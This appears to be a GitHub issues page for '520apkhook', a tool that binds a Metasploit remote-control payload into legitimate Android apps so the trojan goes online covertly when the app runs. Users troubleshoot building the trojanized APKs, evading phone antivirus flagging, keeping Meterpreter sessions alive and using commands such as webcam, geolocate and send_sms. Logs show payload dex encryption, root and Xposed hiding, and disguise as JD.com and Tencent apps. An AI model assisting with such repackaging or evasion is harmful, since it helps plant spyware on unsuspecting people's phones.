ba0gu0 / 520apkhook

Attach the Android remote control APK to a regular app. When the newly generated app is launched, the regular app operates as normal while the remote control goes online seamlessly.

License: Apache License 2.0

Java 86.04% AIDL 2.15% C++ 10.79% CMake 0.21% C 0.40% Assembly 0.41%

520apkhook's Issues

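The injected APK is flagged as a virus by the phone's security manager

When using an Android emulator (LDPlayer, Android 9), the injected APK installs normally and remote control works. But when installing on a physical device, it is flagged as a risk.
Physical device (Redmi 3, Android 5.1.1); the injected app is a weather forecast app + msf.apk.
Ignoring the risk and continuing the installation, the remote control program still does not come online when the app is opened (the physical device and Kali are on the same LAN, home Wi-Fi).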

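Adding parameters when generating the Android backdoor

Hello, how can I automatically add the two parameters sessioncommunicationtimeout=0sessionexpirationtimeout=0 when generating the trojan? I have read your source code, but I still don't quite understand where to start modifying it.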

java.lang.ClassNotFoundException: Didn't find class

D doAttachBaseContext 初始化成功!
2023-08-30 17:34:50.341 29504-29504 520ApkBox ...pplication pid-29504 D 获取到dex 中的Application Class
2023-08-30 17:34:50.342 29504-29504 520ApkBox ...pplication pid-29504 D 加载Dex失败: java.lang.ClassNotFoundException: com.metasploit.stage.MainActivity
2023-08-30 17:34:50.342 29504-29504 System.err pid-29504 W at com.jingdong.app.mall.a520apkbox.MainApplication.bindRealApplication(MainApplication.java:229)
2023-08-30 17:34:50.342 29504-29504 System.err pid-29504 W at com.jingdong.app.mall.a520apkbox.MainApplication.onCreate(MainApplication.java:188)
2023-08-30 17:34:50.343 29504-29504 System.err pid-29504 W Caused by: java.lang.ClassNotFoundException: Didn't find class "com.metasploit.stage.MainActivity" on path: DexPathList[[zip file "/data/app/com.jingdong.app.mall.a520apkbox-1/base.apk"],nativeLibraryDirectories=[/data/app/com.jingdong.app.mall.a520apkbox-1/lib/arm, /data/app/com.jingdong.app.mall.a520apkbox-1/base.apk!/lib/armeabi-v7a, /system/lib, /vendor/lib]]

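Null pointer when opening the injected APK

After injecting and testing several APKs separately, I found that all the apps install normally and reach the launch page, after which a null pointer crash occurs.
Device model: Xiaomi 9
OS version: MIUI 12.5.6
JDK version: ARM64 openjdk version "11.0.16" 2022-07-19 OpenJDK 64-Bit
Python 3 version: Python 3.10.5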

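Cannot find the default launch component; entering the path reports that the file does not exist

For Tencent apps, the app's default launch component .method public onCreate()V cannot be found; in all such cases, enter the component path as WorkDir/dexfile/app/classes/com/tencent/tinker/loader/app/TinkerApplication.smali
Crashes with NetEase apps are not yet resolved

Entering the path above, it reports that the file does not exist.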

Error 132 (cannot execute)

Does this software need any dependencies?
Java version

openjdk 17.0.10 2024-01-16
OpenJDK Runtime Environment (build 17.0.10+7-Debian-1)
OpenJDK 64-Bit Server VM (build 17.0.10+7-Debian-1, mixed mode, sharing)

Error

02/08 11:20:05.046 I/HackApk: 已将被注入Apk复制到模板App的assets目录中.
02/08 11:20:05.049 I/HackApk: 已清空模板App中的 mipmap-xxxhdpi 文件夹.
02/08 11:20:05.065 I/HackApk: 重新向模板App中的 mipmap-xxxhdpi 文件夹复制图标文件.
02/08 11:20:05.067 I/HackApk: 所有资源文件已复制完成.
02/08 11:20:05.067 I/HackApk: 正在进行重新编译模板App.
I: Using Apktool 2.7.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes2 folder into classes2.dex...
I: Checking whether resources has changed...
I: Building resources...
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 132): [/tmp/brut_util_Jar_129685134684315121427687715297487982335.tmp, p, --forced-package-id, 127, --min-sdk-version, 24, --target-sdk-version, 25, --version-code, 807, --version-name, 4.4.0, --no-version-vectors, -F, /tmp/APKTOOL15424374816079338117.tmp, -e, /tmp/APKTOOL18144024524575765135.tmp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /root/123456/workDir/apkBoxDecodeDir/res, -M, /root/123456/workDir/apkBoxDecodeDir/AndroidManifest.xml]
root@localhost:~/123456#

How can this be solved?

Cannot compile

W: C:\Users\xxx\Downloads\workDir\apkBoxDecodeDir\res\values\strings.xml:21: error: Error parsing XML: not well-formed (invalid token)
W:
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [C:\Users\xxx\AppData\Local\Temp\brut_util_Jar_9531012300126581481943319605938899655.tmp, p, --forced-package-id, 127, --min-sdk-version, 23, --target-sdk-version, 28, --version-code, 39, --version-name, 1.0.0, --no-version-vectors, -F, C:\Users\xxx\AppData\Local\Temp\APKTOOL13546282770571653699.tmp, -e, C:\Users\xxx\AppData\Local\Temp\APKTOOL2333949434430769853.tmp, -0, arsc, -I, C:\Users\xxx\AppData\Local\apktool\framework\1.apk, -S, C:\Users\xxx\Downloads\workDir\apkBoxDecodeDir\res, -M, C:\Users\xxx\Downloads\workDir\apkBoxDecodeDir\AndroidManifest.xml]

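Crash during installation

I confirmed that the APK is not packed; on tapping install it shows "installing" and then immediately disappears from the emulator.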

Some commands cannot be used

Only some commands work; ones like geolocate, send_sms and webcam do not, only things like sysinfo. What is going wrong? Android 9, msf6.1.5

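A question about resource files

Thanks for the reply to the previous issue; I have found a new problem.
The strings.xml resource file of my attached APK contains the nodes below. After the APKs are merged, these two nodes do not appear in the resulting APK.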
https://127.0.0.1
1101

Question

Which Java version works?
Compilation fails with java version 1.8.0_202

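Huawei flags it as a virus

I would like to ask how to resolve Huawei phones flagging it as a virus. I can only determine that it is caused by the Module in it.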

Crashes on 32-bit, cannot come online on 64-bit

--------- beginning of crash
--------- beginning of main
07-17 19:42:34.178 W/System.err( 8289): java.lang.ClassNotFoundException: com.metasploit.stage.MainActivity
07-17 19:42:34.178 W/System.err( 8289): at java.lang.Class.classForName(Native Method)
07-17 19:42:34.178 W/System.err( 8289): at java.lang.Class.forName(Class.java:324)
07-17 19:42:34.178 W/System.err( 8289): at java.lang.Class.forName(Class.java:285)
07-17 19:42:34.178 W/System.err( 8289): at com.v2ray.ang.a520apkbox.MainApplication.bindRealApplication(MainApplication.java:229)
07-17 19:42:34.178 W/System.err( 8289): at com.v2ray.ang.a520apkbox.MainApplication.onCreate(MainApplication.java:188)
07-17 19:42:34.178 W/System.err( 8289): at android.app.Instrumentation.callApplicationOnCreate(Instrumentation.java:1017)
07-17 19:42:34.178 W/System.err( 8289): at android.app.ActivityThread.handleBindApplication(ActivityThread.java:4894)
07-17 19:42:34.178 W/System.err( 8289): at android.app.ActivityThread.-wrap1(ActivityThread.java)
07-17 19:42:34.178 W/System.err( 8289): at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1508)
07-17 19:42:34.178 W/System.err( 8289): at android.os.Handler.dispatchMessage(Handler.java:102)
07-17 19:42:34.178 W/System.err( 8289): at android.os.Looper.loop(Looper.java:148)
07-17 19:42:34.178 W/System.err( 8289): at android.app.ActivityThread.main(ActivityThread.java:5654)
07-17 19:42:34.178 W/System.err( 8289): at java.lang.reflect.Method.invoke(Native Method)
07-17 19:42:34.178 W/System.err( 8289): at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:782)
07-17 19:42:34.178 W/System.err( 8289): at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:672)
07-17 19:42:34.178 W/System.err( 8289): Caused by: java.lang.ClassNotFoundException: Didn't find class "com.metasploit.stage.MainActivity" on path: DexPathList[[zip file "/data/app/com.v2ray.ang.a520apkbox-1/base.apk"],nativeLibraryDirectories=[/data/app/com.v2ray.ang.a520apkbox-1/lib/arm64, /data/app/com.v2ray.ang.a520apkbox-1/base.apk!/lib/arm64-v8a, /vendor/lib64, /system/lib64]]
07-17 19:42:34.178 W/System.err( 8289): at dalvik.system.BaseDexClassLoader.findClass(BaseDexClassLoader.java:56)
07-17 19:42:34.178 W/System.err( 8289): at java.lang.ClassLoader.loadClass(ClassLoader.java:511)
07-17 19:42:34.178 W/System.err( 8289): at java.lang.ClassLoader.loadClass(ClassLoader.java:469)
07-17 19:42:34.178 W/System.err( 8289): ... 15 more
07-17 19:42:34.178 W/System.err( 8289): Suppressed: java.lang.ClassNotFoundException: com.metasploit.stage.MainActivity
07-17 19:42:34.179 W/System.err( 8289): at java.lang.Class.classForName(Native Method)
07-17 19:42:34.179 W/System.err( 8289): at java.lang.BootClassLoader.findClass(ClassLoader.java:781)
07-17 19:42:34.179 W/System.err( 8289): at java.lang.BootClassLoader.loadClass(ClassLoader.java:841)
07-17 19:42:34.179 W/System.err( 8289): at java.lang.ClassLoader.loadClass(ClassLoader.java:504)
07-17 19:42:34.179 W/System.err( 8289): ... 16 more
07-17 19:42:34.179 W/System.err( 8289): Caused by: java.lang.NoClassDefFoundError: Class not found using the boot class loader; no stack trace available
07-17 19:42:34.780 W/System.err( 8315): java.lang.ClassNotFoundException: android.hardware.location.IContextHubService$Stub
07-17 19:42:34.780 W/System.err( 8315): at java.lang.Class.classForName(Native Method)
07-17 19:42:34.780 W/System.err( 8315): at java.lang.Class.forName(Class.java:324)
07-17 19:42:34.780 W/System.err( 8315): at java.lang.Class.forName(Class.java:285)
07-17 19:42:34.780 W/System.err( 8315): at top.niunaijun.blackreflection.BlackReflection.getClassNameByBlackClass(BlackReflection.java:239)
07-17 19:42:34.780 W/System.err( 8315): at top.niunaijun.blackreflection.BlackReflection.create(BlackReflection.java:55)
07-17 19:42:34.780 W/System.err( 8315): at black.android.hardware.location.BRIContextHubServiceStub.get(BRIContextHubServiceStub.java:13)
07-17 19:42:34.780 W/System.err( 8315): at top.niunaijun.blackbox.fake.service.IContextHubServiceProxy.getWho(IContextHubServiceProxy.java:25)
07-17 19:42:34.780 W/System.err( 8315): at top.niunaijun.blackbox.fake.hook.ClassInvocationStub.injectHook(ClassInvocationStub.java:51)
07-17 19:42:34.780 W/System.err( 8315): at top.niunaijun.blackbox.fake.hook.HookManager.injectAll(HookManager.java:186)
07-17 19:42:34.780 W/System.err( 8315): at top.niunaijun.blackbox.fake.hook.HookManager.init(HookManager.java:157)
07-17 19:42:34.780 W/System.err( 8315): at top.niunaijun.blackbox.BlackBoxCore.doAttachBaseContext(BlackBoxCore.java:159)
07-17 19:42:34.780 W/System.err( 8315): at com.v2ray.ang.a520apkbox.MainApplication.attachBaseContext(MainApplication.java:108)
07-17 19:42:34.780 W/System.err( 8315): at android.app.Application.attach(Application.java:257)
07-17 19:42:34.780 W/System.err( 8315): at android.app.Instrumentation.newApplication(Instrumentation.java:997)
07-17 19:42:34.780 W/System.err( 8315): at android.app.Instrumentation.newApplication(Instrumentation.java:981)
07-17 19:42:34.780 W/System.err( 8315): at android.app.LoadedApk.makeApplication(LoadedApk.java:583)
07-17 19:42:34.780 W/System.err( 8315): at android.app.ActivityThread.handleBindApplication(ActivityThread.java:4867)
07-17 19:42:34.780 W/System.err( 8315): at android.app.ActivityThread.-wrap1(ActivityThread.java)
07-17 19:42:34.780 W/System.err( 8315): at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1508)
07-17 19:42:34.780 W/System.err( 8315): at android.os.Handler.dispatchMessage(Handler.java:102)
07-17 19:42:34.780 W/System.err( 8315): at android.os.Looper.loop(Looper.java:148)
07-17 19:42:34.780 W/System.err( 8315): at android.app.ActivityThread.main(ActivityThread.java:5654)
07-17 19:42:34.780 W/System.err( 8315): at java.lang.reflect.Method.invoke(Native Method)
07-17 19:42:34.780 W/System.err( 8315): at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:782)
07-17 19:42:34.780 W/System.err( 8315): at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:672)
07-17 19:42:34.780 W/System.err( 8315): Caused by: java.lang.ClassNotFoundException: Didn't find class "android.hardware.location.IContextHubService$Stub" on path: DexPathList[[zip file "/data/app/com.v2ray.ang.a520apkbox-1/base.apk"],nativeLibraryDirectories=[/data/app/com.v2ray.ang.a520apkbox-1/lib/arm64, /data/app/com.v2ray.ang.a520apkbox-1/base.apk!/lib/arm64-v8a, /vendor/lib64, /system/lib64]]
07-17 19:42:34.780 W/System.err( 8315): at dalvik.system.BaseDexClassLoader.findClass(BaseDexClassLoader.java:56)
07-17 19:42:34.780 W/System.err( 8315): at java.lang.ClassLoader.loadClass(ClassLoader.java:511)
07-17 19:42:34.780 W/System.err( 8315): at java.lang.ClassLoader.loadClass(ClassLoader.java:469)
07-17 19:42:34.780 W/System.err( 8315): ... 25 more
07-17 19:42:34.780 W/System.err( 8315): Suppressed: java.lang.ClassNotFoundException: android.hardware.location.IContextHubService$Stub
07-17 19:42:34.780 W/System.err( 8315): at java.lang.Class.classForName(Native Method)
07-17 19:42:34.780 W/System.err( 8315): at java.lang.BootClassLoader.findClass(ClassLoader.java:781)
07-17 19:42:34.780 W/System.err( 8315): at java.lang.BootClassLoader.loadClass(ClassLoader.java:841)
07-17 19:42:34.780 W/System.err( 8315): at java.lang.ClassLoader.loadClass(ClassLoader.java:504)
07-17 19:42:34.780 W/System.err( 8315): ... 26 more
07-17 19:42:34.780 W/System.err( 8315): Caused by: java.lang.NoClassDefFoundError: Class not found using the boot class loader; no stack trace available
07-17 19:42:34.843 W/System.err( 8315): java.lang.ClassNotFoundException: com.metasploit.stage.MainActivity
07-17 19:42:34.843 W/System.err( 8315): at java.lang.Class.classForName(Native Method)
07-17 19:42:34.843 W/System.err( 8315): at java.lang.Class.forName(Class.java:324)
07-17 19:42:34.843 W/System.err( 8315): at java.lang.Class.forName(Class.java:285)
07-17 19:42:34.843 W/System.err( 8315): at com.v2ray.ang.a520apkbox.MainApplication.bindRealApplication(MainApplication.java:229)
07-17 19:42:34.843 W/System.err( 8315): at com.v2ray.ang.a520apkbox.MainApplication.onCreate(MainApplication.java:188)
07-17 19:42:34.843 W/System.err( 8315): at android.app.Instrumentation.callApplicationOnCreate(Instrumentation.java:1017)
07-17 19:42:34.843 W/System.err( 8315): at top.niunaijun.blackbox.fake.delegate.BaseInstrumentationDelegate.callApplicationOnCreate(BaseInstrumentationDelegate.java:225)
07-17 19:42:34.843 W/System.err( 8315): at top.niunaijun.blackbox.fake.delegate.AppInstrumentation.callApplicationOnCreate(AppInstrumentation.java:140)
07-17 19:42:34.843 W/System.err( 8315): at android.app.ActivityThread.handleBindApplication(ActivityThread.java:4894)
07-17 19:42:34.843 W/System.err( 8315): at android.app.ActivityThread.-wrap1(ActivityThread.java)
07-17 19:42:34.843 W/System.err( 8315): at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1508)
07-17 19:42:34.843 W/System.err( 8315): at android.os.Handler.dispatchMessage(Handler.java:102)
07-17 19:42:34.843 W/System.err( 8315): at android.os.Looper.loop(Looper.java:148)
07-17 19:42:34.843 W/System.err( 8315): at android.app.ActivityThread.main(ActivityThread.java:5654)
07-17 19:42:34.843 W/System.err( 8315): at java.lang.reflect.Method.invoke(Native Method)
07-17 19:42:34.843 W/System.err( 8315): at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:782)
07-17 19:42:34.843 W/System.err( 8315): at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:672)
07-17 19:42:34.843 W/System.err( 8315): Caused by: java.lang.ClassNotFoundException: Didn't find class "com.metasploit.stage.MainActivity" on path: DexPathList[[zip file "/data/app/com.v2ray.ang.a520apkbox-1/base.apk"],nativeLibraryDirectories=[/data/app/com.v2ray.ang.a520apkbox-1/lib/arm64, /data/app/com.v2ray.ang.a520apkbox-1/base.apk!/lib/arm64-v8a, /vendor/lib64, /system/lib64]]
07-17 19:42:34.843 W/System.err( 8315): at dalvik.system.BaseDexClassLoader.findClass(BaseDexClassLoader.java:56)
07-17 19:42:34.843 W/System.err( 8315): at java.lang.ClassLoader.loadClass(ClassLoader.java:511)
07-17 19:42:34.843 W/System.err( 8315): at java.lang.ClassLoader.loadClass(ClassLoader.java:469)
07-17 19:42:34.843 W/System.err( 8315): ... 17 more
07-17 19:42:34.843 W/System.err( 8315): Suppressed: java.lang.ClassNotFoundException: com.metasploit.stage.MainActivity
07-17 19:42:34.843 W/System.err( 8315): at java.lang.Class.classForName(Native Method)
07-17 19:42:34.843 W/System.err( 8315): at java.lang.BootClassLoader.findClass(ClassLoader.java:781)
07-17 19:42:34.843 W/System.err( 8315): at java.lang.BootClassLoader.loadClass(ClassLoader.java:841)
07-17 19:42:34.843 W/System.err( 8315): at java.lang.ClassLoader.loadClass(ClassLoader.java:504)
07-17 19:42:34.843 W/System.err( 8315): ... 18 more
07-17 19:42:34.843 W/System.err( 8315): Caused by: java.lang.NoClassDefFoundError: Class not found using the boot class loader; no stack trace available

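Cannot install or run

Downloaded and configured as instructed,
~/Downloads/京东.apk ~/Downloads/msf.apk and the final generated 520apk
After building, I found that it cannot run on Android 6, 7, 9, 10 or 11 emulators. Could you tell me which version should be used?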

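Solutions to some difficult problems

  1. For Tencent apps, the app's default launch component .method public onCreate()V cannot be found; in all such cases, enter the component path as WorkDir/dexfile/app/classes/com/tencent/tinker/loader/app/TinkerApplication.smali
  2. Crashes with NetEase apps are not yet resolved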

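The files have problems and the tutorial is not detailed

Incorrect file path: make sure the file path is correct and that the file actually exists.
File permission problem: make sure the current user has sufficient read permission for the file.
File format problem: make sure the file is a valid APK file that has not been modified or corrupted.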
7/24 19:43:33.306 E/Main: 读取被注入Apk文件信息失败, 无法进行下一步, 程序退出! /root/Downloads/京东.apk
java.nio.file.NoSuchFileException: /root/Downloads/京东.apk

Cannot find the launch component

I am using a Tencent app, but following the path you provided I cannot find /tinker/loader/app/TinkerApplication.smali

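Incompatible

Hello, I have found a problem: the normal APK being bundled must be named 京东.apk (the APK itself can be any other APK, but its name must be 京东); only then does running the jar merge execute properly and generate the APK bundled with the msf trojan. It installs and comes online normally in a virtual machine, but on a real phone, on versions below Android 13, installation reports that the package is corrupted. Have you run into this problem?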

Which directory is the generated file in, or do I need to package it into an APK file myself?

BaoGuo仍给你一个Apk,请安装它!
java -jar a520ApkHook-1.1-jar-with-dependencies.jar yyb.apk msf.apk

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
06/06 14:39:11.763 I/Config: 创建工作目录, /root/workDir
06/06 14:39:11.772 I/Config: 初始化配置信息完成.
06/06 14:39:11.772 I/Main: 启动程序.

06/06 14:39:11.772 I/Main: 初始化工作环境.
06/06 14:39:11.773 I/Config: 从Jar包中释放工具文件.
06/06 14:39:11.887 I/Config: 已释放 apktool.jar .
06/06 14:39:11.894 I/Config: 已释放 apksigner.jar .
06/06 14:39:11.894 I/Config: 已释放 Android.keystore .
06/06 14:39:11.920 I/Config: 已释放 520ApkBox64.apk .
06/06 14:39:11.942 I/Config: 已释放 520ApkBox32.apk .
06/06 14:39:11.942 I/Main: 释放所有脚本成功.
06/06 14:39:11.943 I/Main: 被注入的 Apk 文件为: yyb.apk
06/06 14:39:11.943 I/Main: 进行注入的 Payload Apk 文件为: msf.apk
06/06 14:39:11.943 I/Main: 尝试读取被注入Apk的信息. yyb.apk
06/06 14:39:12.017 I/GetSourceApkInfo: 获取注入 Apk 的MetaDate信息: {AppTargetSdkVersion=26, AppMaxSdkVersion=null, AppVersionCode=8432130, AppVersionName=8.4.3, AppMinSdkVersion=21, AppName=应用宝, AppPackageName=com.tencent.android.qqdownloader}
06/06 14:39:12.018 I/GetSourceApkInfo: 获取注入 Apk 的所有图标信息: [Icon{path='res/b/ic_launcher.png', density=0, size=2071}, Icon{path='res/k/ic_launcher.png', density=320, size=2071}]
06/06 14:39:12.021 I/GetSourceApkInfo: 获取注入 Apk 的最大的图标信息: Icon{path='res/k/ic_launcher.png', density=320, size=2071}
06/06 14:39:12.023 I/GetSourceApkInfo: 读取注入 Apk 最大的图标并保存, 保存位置: /root/workDir/hackApkIcon.png
06/06 14:39:12.144 I/GetSourceApkInfo: 在注入 Apk 中找到文件: lib/arm64-v8a/libBugly_Native.so
06/06 14:39:12.144 I/GetSourceApkInfo: 获取注入 Apk 的Arch信息: arm64-v8a
06/06 14:39:12.144 I/Main: 读取被注入Apk信息已完成.
06/06 14:39:12.145 I/Main: 尝试读取 Payload Apk的信息. msf.apk
06/06 14:39:12.146 I/GetPayloadApkInfo: 使用apktool反编译 Payload Apk, msf.apk
I: Using Apktool 2.7.0 on msf.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values / XMLs...
I: Copying raw classes.dex file...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
06/06 14:39:13.751 I/GetPayloadApkInfo: 解析 Payload Apk 的AndroidManifest.xml文件, 并创建新的 AndroidManifest-New.xml文件.
06/06 14:39:13.765 I/GetPayloadApkInfo: 为目标receiver添加android:exported=true属性.
06/06 14:39:13.781 I/GetPayloadApkInfo: 成功获取到 Payload Apk 的MainActivityName.
06/06 14:39:13.783 I/GetPayloadApkInfo: 获取 payload Apk 文件中的Provider、Receiver、Service、Meta-data、Activity成功.
06/06 14:39:13.783 I/GetPayloadApkInfo: 尝试对 Payload Apk的dex文件进行加密压缩. msf.apk
06/06 14:39:13.783 I/GetPayloadApkInfo: dex文件加密密码为: d8Fx23JB
06/06 14:39:13.793 I/Main: 开始进行对被注入Apk进行包装.
06/06 14:39:13.793 I/HackApk: 目标Apk支持64位, 使用apktool反编译模板Apk, /root/workDir/libs/520ApkBox64.apk
I: Using Apktool 2.7.0 on 520ApkBox64.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values / XMLs...
I: Baksmaling classes.dex...
I: Baksmaling classes2.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
I: Copying META-INF/services directory
06/06 14:39:17.937 I/Main: 反编译模板Apk成功.
06/06 14:39:17.937 I/HackApk: 解析并修改模板Apk的AndroidManifest.xml文件.
06/06 14:39:17.945 I/HackApk: 设置模板Appassets目录存储的被注入Apk名字. 1ce63c7f-55cb-4931-b8bc-7af39697f918
06/06 14:39:17.945 I/HackApk: 设置包装器的启动包名. com.tencent.android.qqdownloader
06/06 14:39:17.945 I/HackApk: 设置包装器开启守护进程. false
06/06 14:39:17.946 I/HackApk: 设置包装器隐藏Root. true
06/06 14:39:17.946 I/HackApk: 设置包装器隐藏Xposed. true
06/06 14:39:17.946 I/HackApk: 设置压缩后的dex文件名字. b17de3a2-9419-46a6-ae7c-4e98d2ccd2c6
06/06 14:39:17.946 I/HackApk: 设置dex文件的压缩包密码. d8Fx23JB
06/06 14:39:17.946 I/HackApk: 设置 Payload apk 的ApplicationName. android.app.Application
06/06 14:39:17.946 I/HackApk: 设置 Payload apk 的MainActivityName. com.metasploit.stage.MainActivity
06/06 14:39:17.946 I/HackApk: 将payload apk中的AndroidManifest-new.xml追加到apkbox的AndroidManifest.xml中.
06/06 14:39:17.950 I/HackApk: 写入模板App的AndroidManifest.xml文件成功.
06/06 14:39:17.951 I/HackApk: 解析并修改模板App的string.xml文件.
06/06 14:39:17.954 I/HackApk: 设置模板App显示的名字. 应用宝
06/06 14:39:17.955 I/HackApk: 写入模板App的string.xml文件成功.
06/06 14:39:17.956 I/HackApk: 修复模板App的values-v31/colors.xml文件.
06/06 14:39:17.957 I/HackApk: 修复模板App的values-v31/colors.xml文件成功.
06/06 14:39:17.957 I/HackApk: 解析并修改模板App的apktool.yml文件.
06/06 14:39:17.958 I/HackApk: 修改模板App的minSdkVersion、targetSdkVersion、versionName、versionCode信息.
06/06 14:39:17.958 I/HackApk: 修改模板App的apktool.yml文件成功.
06/06 14:39:17.958 I/HackApk: 原始smali文件路径: /root/workDir/apkBoxDecodeDir/smali/com/android/a520apkbox
06/06 14:39:17.958 I/HackApk: 修改后smali文件路径: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox
06/06 14:39:17.959 I/HackApk: 创建新的smali目录: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox
06/06 14:39:17.968 I/HackApk: 复制原始smali文件到新的smali目录中.
06/06 14:39:17.972 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/R$style.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.972 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/MainApplication$1.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.973 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/R$mipmap.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.974 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/MainApplication.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.975 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/ProxyUtils.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.975 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/MainApplication$2.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.976 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/R$layout.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.976 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/R$color.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.977 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/R$xml.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.977 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/ClassLoaderUtils.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.978 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/R$string.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.979 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/BuildConfig.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.979 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/MainActivity.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.992 I/HackApk: 已修改smali文件: /root/workDir/apkBoxDecodeDir/smali/com/tencent/android/qqdownloader/a520apkbox/R.smali, 替换 com/android/a520apkbox 为 com/tencent/android/qqdownloader/a520apkbox , 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox .
06/06 14:39:17.995 I/HackApk: 已修改AndroidManifest.xml文件. 替换 com.android.a520apkbox 为 com.tencent.android.qqdownloader.a520apkbox
06/06 14:39:17.999 I/HackApk: 开始复制资源文件到模板App中.
06/06 14:39:17.999 I/HackApk: 已将Payload Apk 的Dex压缩包复制到模板App的assets目录中.
06/06 14:39:18.048 I/HackApk: 已将被注入Apk复制到模板App的assets目录中.
06/06 14:39:18.048 I/HackApk: 已清空模板App中的 mipmap-xxxhdpi 文件夹.
java.lang.NullPointerException
at java.base/java.io.File.<init>(File.java:278)
at org.a520apkhook.HackApk.copyAssesResFile(HackApk.java:248)
at org.a520apkhook.App.startHackApk(App.java:125)
at org.a520apkhook.App.run(App.java:76)
at picocli.CommandLine.executeUserObject(CommandLine.java:2026)
at picocli.CommandLine.access$1500(CommandLine.java:148)
at picocli.CommandLine$RunLast.executeUserObjectOfLastSubcommandWithSameParent(CommandLine.java:2461)
at picocli.CommandLine$RunLast.handle(CommandLine.java:2453)
at picocli.CommandLine$RunLast.handle(CommandLine.java:2415)
at picocli.CommandLine$AbstractParseResultHandler.execute(CommandLine.java:2273)
at picocli.CommandLine$RunLast.execute(CommandLine.java:2417)
at picocli.CommandLine.execute(CommandLine.java:2170)
at org.a520apkhook.App.main(App.java:44)

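A question

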